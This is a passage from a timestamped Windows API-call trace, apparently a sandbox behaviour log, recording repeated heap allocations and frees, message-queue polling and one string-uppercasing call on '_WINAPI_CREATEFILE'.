returned 0x9bf310 [0167.102] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0167.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0167.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec90 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1a20 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dead8 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7b0 [0167.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1900 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1ac0 [0167.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ac0 | out: hHeap=0x8a0000) returned 1 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1ac0 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19f0 [0167.102] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0167.102] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0167.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded30 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df028 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0167.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7e0 | out: hHeap=0x8a0000) returned 1 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dece0 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7e0 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded58 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1960 [0167.103] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd558 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0167.103] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18f0 [0167.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0167.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0167.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0167.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deec0 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5b8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0167.104] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2698 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.104] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0167.104] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0167.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedd0 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2828 [0167.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0167.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2828 | out: hHeap=0x8a0000) returned 1 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df140 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2828 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2738 [0167.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5d0 | out: hHeap=0x8a0000) returned 1 [0167.105] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df000 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5d0 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2738 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.105] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.106] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.106] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.106] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.107] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0167.107] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda50 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.108] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.108] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.109] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdb10 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.109] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.109] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bdb10 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba2e8 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda08 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba0f0 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba138 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd7f8 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9d8 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db138 [0167.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd528 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd420 [0167.110] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.110] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0167.111] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd420 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0167.111] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0167.112] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd528 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8decb8 | out: hHeap=0x8a0000) returned 1 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2718 [0167.112] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0167.112] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2718 | out: hHeap=0x8a0000) returned 1 [0167.113] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0167.113] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 